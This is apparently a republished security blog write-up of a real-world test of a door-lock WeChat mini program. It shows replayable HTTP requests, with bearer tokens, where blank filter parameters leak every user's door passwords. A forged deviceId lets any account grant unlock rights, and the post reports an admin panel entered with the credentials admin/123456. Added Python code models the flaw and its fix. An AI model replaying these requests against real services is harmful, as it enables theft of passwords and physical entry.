Unauthorized-access vulnerability hunting in a WeChat mini program (the blank-parameter query approach)
2024-1-22 22:49:24 Author: mp.weixin.qq.com Views: 41

01 Originality note

This article is a real-world case study shared by 苏木师傅 (Sumu).

02 Penetration log

WeChat mini program xxx: tap "Door Card", then "Add Password", and intercept the request; the response body discloses the password. The same API also allows granting door-opening permission to any phone number from any account (broken authorization).

03 Unauthorized access #1

Blanking the userId and isBind values makes the endpoint return every user's password.

Request:

GET /prod-api/nfc/device/list?userId=&isBind= HTTP/1.1
Host: XXX.XXX.cn
Xweb_xhr: 1
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

04 Unauthorized access #2

Normally this endpoint returns only the caller's own password.

Blanking the deviceId, isMain and status values makes it return every user's password.

Request:

GET /prod-api/fy/cardkey/list?deviceId=&isMain=&status= HTTP/1.1
Host: XXX.XXX.cn
Xweb_xhr: 1
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQ
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

05 Unauthorized access #3

Request:

POST /prod-api/fy/cardkey HTTP/1.1
Host: xxx.xxx.cn
Content-Length: 131
Xweb_xhr: 1
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImJiMDIxZjZmLTZmY2UtNDRmOS04M2FlLTBkZmMxZDEyZTZlNiJ9.ndIZOlqG9vXCvb2EBc5efx14tz3VtED_uRrFrCS-FhyBNY4MQTdu08ZVU6QfrrACGmuH_eZbr_uRfWBsEVXT6g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531
Content-Type: application/json
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"deviceId":"758","passType":"4","password":"978949","endData":0,"phone":"18888888888","startTime":"2024-01-19 09:00","endTime":""}

By changing the deviceId value, any account can grant unlock permission for a specified phone number on a device it does not own; the server never checks that the caller owns the device.
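The root cause behind all three findings is the same: the list endpoints treat a blank filter parameter as "no filter", and the create endpoint trusts a client-supplied deviceId, so row ownership is never tied to the authenticated user. The following added example (not code from the original article or from the affected backend) reproduces that behaviour with a constructed in-memory table and shows the hardened variant beside it; it assumes a MyBatis-style optional-filter query builder, which is an assumption about the target, not something the article states.

```python
import sqlite3

# Constructed sample data: two users, each owning one device with a card-key password.
ROWS = [(1, 101, "111111"), (2, 202, "222222")]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cardkey (user_id INT, device_id INT, password TEXT)")
    db.executemany("INSERT INTO cardkey VALUES (?, ?, ?)", ROWS)
    return db

def list_vulnerable(db, params):
    """Assumed MyBatis-style dynamic filter: a blank value drops its WHERE clause,
    so '?userId=&deviceId=' returns every row (findings #1 and #2)."""
    clauses, args = [], []
    for col, key in (("user_id", "userId"), ("device_id", "deviceId")):
        val = params.get(key, "")
        if val != "":                       # empty string means "do not filter"
            clauses.append(f"{col} = ?")
            args.append(int(val))
    sql = "SELECT user_id, device_id, password FROM cardkey"
    if clauses:
        sql += " WHERE " + " AND ".join(clauses)
    return db.execute(sql, args).fetchall()

def list_hardened(db, params, auth_user_id):
    """Ownership comes from the authenticated session, never from the query string:
    a client-supplied userId is ignored, and deviceId only narrows the caller's rows."""
    sql = "SELECT user_id, device_id, password FROM cardkey WHERE user_id = ?"
    args = [auth_user_id]
    if params.get("deviceId"):
        sql += " AND device_id = ?"
        args.append(int(params["deviceId"]))
    return db.execute(sql, args).fetchall()

def may_grant(db, device_id, auth_user_id):
    """Finding #3: POST /fy/cardkey with another user's deviceId. The fix is an
    ownership check on the device before any key is created for a phone number."""
    row = db.execute("SELECT 1 FROM cardkey WHERE device_id = ? AND user_id = ?",
                     (device_id, auth_user_id)).fetchone()
    return row is not None
```

The same blank-value pattern is worth a log rule: requests to list endpoints whose filter parameters are all present but empty are a cheap signal of someone probing for this class of bug.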

06 Weak password

With the mini program covered, I turned to the web side. Luckily a weak password got me in; it turned out to be a RuoYi (若依) system, but unfortunately none of its known historical vulnerabilities were present.

URL: https://XXX.XXX.cn/

Account: admin

Password: 123456

Source: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247493356&idx=1&sn=713762a960605cfa851ac6016d4b1ffa&chksm=e8a5ec8fdfd26599f40863bea38e224e26d198c43c22a37955f024c6383956eb8f42c5342de9&scene=58&subscene=0#rd